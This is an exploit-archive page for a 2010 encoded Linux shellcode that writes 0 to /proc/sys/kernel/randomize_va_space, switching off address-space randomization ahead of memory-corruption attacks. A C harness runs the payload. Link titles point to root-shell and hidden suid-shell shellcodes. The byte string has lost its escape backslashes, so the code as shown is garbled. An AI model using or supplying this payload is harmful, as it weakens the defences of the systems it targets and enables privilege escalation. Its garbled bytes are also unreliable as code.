111 bytes echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 111 bytes echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode
# Published : 2010-07-05
# Author : gunslinger_
# Previous Title : 62 bytes setreuid(0,0) execve("/bin/sh",NULL,NULL) XOR Encoded Linux Shellcode
# Next Title : 161 bytes Drop suid shell root in /tmp/.hiddenshell Linux Polymorphic Shellcode

/*
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>

char shellcode[] = "xebx11x5ex31xc9xb1x57x80x44x0exffx01"
	     	   "x80xe9x01x75xf6xebx05xe8xeaxffxffxff"
	     	   "x5fx30xbfx30xd1xafx0ax51x67x6dx2ex72"
	     	   "x67x67x2ex2ex61x68x88xe2x51x67x2cx62"
	     	   "x62x62x88xe0x51xeax06x50x52x88xe0xcc"
	     	   "x7fx60xe7xf3xfexfexfex64x62x67x6ex1f"
	     	   "x2fx1fx3dx1fx2ex6fx71x6ex62x2ex72x78"
	     	   "x72x2ex6ax64x71x6dx64x6bx2ex71x60x6d"
	     	   "x63x6ex6cx68x79x64x5ex75x60x5ex72x6f"
	     	   "x60x62x64";
		
int main(void)
{
	fprintf(stdout,"Length: %dn",strlen(shellcode));
	(*(void(*)()) shellcode)();
}